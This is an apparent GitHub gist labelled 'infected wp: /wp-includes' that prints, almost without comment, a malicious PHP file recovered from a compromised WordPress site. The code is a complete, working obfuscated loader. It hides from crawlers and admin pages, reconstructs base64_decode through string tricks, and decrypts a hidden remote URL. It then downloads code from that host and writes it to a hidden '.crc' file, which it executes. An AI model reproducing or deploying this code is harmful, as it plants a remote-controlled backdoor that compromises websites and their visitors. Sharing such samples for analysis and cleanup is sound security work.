Create a gist now

Instantly share code, notes, and snippets.

@nikitasius /wp-mod.php Secret
Created Feb 16, 2017

What would you like to do?
infected wp: /wp-includes
<?php
@ini_set('display_errors', '0');
error_reporting(0);
$bad_agents = '~google|360Spider|80legs|AIBOT|Aboundex|Acunetix|AhrefsBot|Alexibot|BLEXBot|BackDoorBot|BackWeb|Baiduspider|Bandit|BatchFTP|Bigfoot|Black.Hole|BlackWidow|BlowFish|BotALot|Buddy|BuiltBotTough|Bullseye|BunnySlippers|Cegbfeieh|CheeseBot|CherryPicker|ChinaClaw|Cogentbot|Collector|Copier|CopyRightCheck|Crescent|Custo|DIIbot|DISCo|DittoSpyder|Download Demon|Download Devil|Download Wonder|Drip|EasyDL|EirGrabber|EmailCollector|EmailSiphon|EmailWolf|EroCrawler|Exabot|Express WebPictures|Extractor|EyeNetIE|FHscan|Foobot|FrontPage|Go-Ahead-Got-It|GrabNet|Grafula|HMView|HTTrack|Harvest|IlseBot|Image Stripper|Image Sucker|Indy Library|InfoNavibot|InfoTekies|Intelliseek|InterGET|Internet Ninja|Iria|JOC|Jakarta|James BOT|Java|JennyBot|JetCar|JustView|Jyxobot|Kenjin.Spider|Keyword.Density|LNSpiderguy|LWP::Simple|LexiBot|LinkScan/8.1a.Unix|LinkWalker|LinkextractorPro|LinkpadBot|MIDown tool|MIIxpc|MJ12bot|Mag-Net|Magnet|MarkWatch|Mass Downloader|Mata.Hari|MegaIndex.ru/2.0|Memo|Microsoft URL Control|Microsoft.URL|Mirror|Missigua Locator|Mister PiX|Mozilla.\*NEWT|Mozilla\/3.Mozilla\/2.01|NAMEPROTECT|NICErsPRO|NPbot|Navroad|NearSite|Net Vampire|NetAnts|NetMechanic|NetSpider|NetZIP|Netcraft|NextGenSearchBot|NimbleCrawler|Ninja|Octopus|Offline Explorer|Offline Navigator|Openfind|OutfoxBot|PHP version tracker|PageGrabber|Papa Foto|Pockey|ProPowerBot\/2.14|ProWebWalker|Pump|QueryN.Metasearch|RMA|ReGet|RealDownload|Reaper|Recorder|RepoMonkey|SEOkicks|SearchmetricsBot|SemrushBot|Siphon|SiteExplorer|SiteSnagger|SlySearch|SmartDownload|Snake|Snapbot|Snoopy|SpaceBison|SpankBot|Sqworm|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|Szukacz\/1.4|Teleport|Telesoft|The.Intraformant|TheNomad|TightTwatBot|Titan|True_bot|TurnitinBot|TurnitinBot\/1.5|URLy.Warning|VCI|Vacuum|VoidEYE|WISENutbot|WWW-Collector-E|WWWOFFLE|Web Image Collector|Web Sucker|Web.Image.Collector|WebAuto|WebBandit|WebCopier|WebEMailExtrac.\*\" bot|WebEnhancer|WebFetch|WebGo IS|WebLeacher|WebReaper|WebSauger|WebStripper|WebWhacker|WebZIP|Webclipping.com|WebmasterWorldForumBot|Website Quester|Website eXtractor|Webster|Wget|Whacker|Widow|Xaldon|Xenu|Zeus|ZmEu|Zyborg|archive.org_bot|asterias|attach|cosmos|dragonfly|eCatch|ebingbong|flunky|gotit|hloader|humanlinks|ia_archiver|larbin|lftp|libWeb\/clsHTTP|likse|lwp-trivial|moget|niki-bot|pavuk|pcBrowser|psbot|rogerBot|sogou|spanner|spbot|suzuran|tAkeOut|turingos~i';
$bad_urls = '#xmlrpc.php|wp-includes|wp-content|wp-login.php|wp-cron.php|\?feed=|wp-json|\/feed|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.tiff|\.mpg|\.wmv|\.mp3|\.mpeg|\.zip|\.gzip|\.rar|\.exe|\.pdf|\.doc|\.swf|\.txt|\.xml|wp-admin|administrator#';
if (!@preg_match($bad_agents, $_SERVER['HTTP_USER_AGENT']) && !function_exists('httpget') && !@preg_match($bad_urls, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'])) {
$ea = '_shaesx_'; $ay = 'httpget'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'crc';
$pass = "Zgc5c4MXrLszcAQOrYpaOLGePlOUMLhZ3zuKAQ==";
function httpget($url) {
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($ch);
curl_close($ch);
return $data;
} elseif (@ini_get('allow_url_fopen')) {
return @file_get_contents($url);
} else {
$parts = parse_url($url);
$target = $parts['host'];
$port = isset($parts['port']) ? $parts['port'] : 80;
$page = isset($parts['path']) ? $parts['path'] : '';
$page .= isset($parts['query']) ? '?' . $parts['query'] : '';
$page .= isset($parts['fragment']) ? '#' . $parts['fragment'] : '';
$page = ($page == '') ? '/' : $page;
if ($fp = @fsockopen($target, $port, $errno, $errstr, 3)) {
@socket_set_option($fp, SOL_SOCKET, SO_RCVTIMEO, array("sec"=>1, "usec"=>1));
$headers = "GET $page HTTP/1.1\r\n";
$headers .= "Host: {$parts['host']}\r\n";
$headers .= "Connection: Close\r\n\r\n";
if (fwrite($fp, $headers)) {
$resp = '';
while (!feof($fp) && ($curr = fgets($fp, 128)) !== false) {
$resp .= $curr;
}
if (isset($curr) && $curr !== false) {
fclose($fp);
return substr(strstr($resp, "\r\n\r\n"), 3);
}
}
fclose($fp);
}
}
return false;
}
function wp_cd($fd, $fa="")
{
$fe = "wp_frmfunct";
$len = strlen($fd);
$ff = '';
$n = $len>100 ? 8 : 2;
while( strlen($ff)<$len )
{
$ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
}
return $fd^$ff;
}
$reqw = $ay($ao($oa("$pass"), 'wp_function'));
preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
$dirs = glob("*", GLOB_ONLYDIR);
$ura = 0;
foreach ($dirs as $dira) {
if (file_exists("$dira/.$algo")) {
$ura = 1;
$eb = "$dira/";
@include_once "$dira/.$algo";
break;
}
$subdirs = glob("$dira/*", GLOB_ONLYDIR);
foreach ($subdirs as $subdira) {
if (file_exists("$subdira/.$algo")) {
$ura = 1;
$eb = "$subdira/";
@include_once("$dira/.$algo");
break;
}
}
}
if (!$ura) {
foreach ($dirs as $dira) {
if (fopen("$dira/.$algo", 'w')) {
$ura = 1;
$eb = "$dira/";
$hdl = fopen("$dira/.$algo", 'w');
break;
}
$subdirs = glob("$dira/*", GLOB_ONLYDIR);
foreach ($subdirs as $subdira) {
if (fopen("$subdira/.$algo", 'w')) {
$ura = 1;
$eb = "$subdira/";
$hdl = fopen("$subdira/.$algo", 'w');
break;
}
}
}
if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
fwrite($hdl, rawurldecode($mtchs[1]));
fclose($hdl);
@include("{$eb}.$algo");
}
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment